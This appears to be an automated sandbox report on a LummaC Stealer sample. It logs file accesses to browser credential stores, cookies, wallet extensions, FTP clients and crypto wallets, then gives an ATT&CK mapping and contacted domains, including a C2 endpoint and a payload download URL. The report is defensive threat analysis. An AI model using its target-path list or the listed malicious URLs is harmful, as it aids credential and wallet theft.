Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\701961\Puts.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND			Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	211 Masquerading	2 OS Credential Dumping	211 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	121 Virtualization/Sandbox Evasion	11 Input Capture	3 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Obfuscated Files or Information	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pennicle.txt.ps1	3%	ReversingLabs	Win32.Dropper.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\701961\Puts.com	5%	ReversingLabs
C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	18%	ReversingLabs

Source	Detection	Scanner	Label
https://storageinstance.oss-ap-southeast-1.aliyuncs.com/link/process/SolPen.zip	100%	Avira URL Cloud	malware
https://battle-curbe.cyou/api	0%	Avira URL Cloud	safe
https://storageinstance.oss-ap-southeast-1.aliyuncs.com	100%	Avira URL Cloud	malware
http://storageinstance.oss-ap-southeast-1.aliyuncs.com	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
battle-curbe.cyou	172.67.128.233	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
storageinstance.oss-ap-southeast-1.aliyuncs.com	47.79.48.182	true	false	unknown
QbeMCwQrsKPS.QbeMCwQrsKPS	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://battle-curbe.cyou/api	true	Avira URL Cloud: safe	unknown
https://storageinstance.oss-ap-southeast-1.aliyuncs.com/link/process/SolPen.zip	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1466706779.000001D590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://storageinstance.oss-ap-southeast-1.aliyuncs.com	powershell.exe, 00000000.00000002.1444500671.000001D581632000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://storageinstance.oss-ap-southeast-1.aliyuncs.com	powershell.exe, 00000000.00000002.1444500671.000001D581AA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000000.00000002.1444500671.000001D581632000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1466706779.000001D590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	false		high
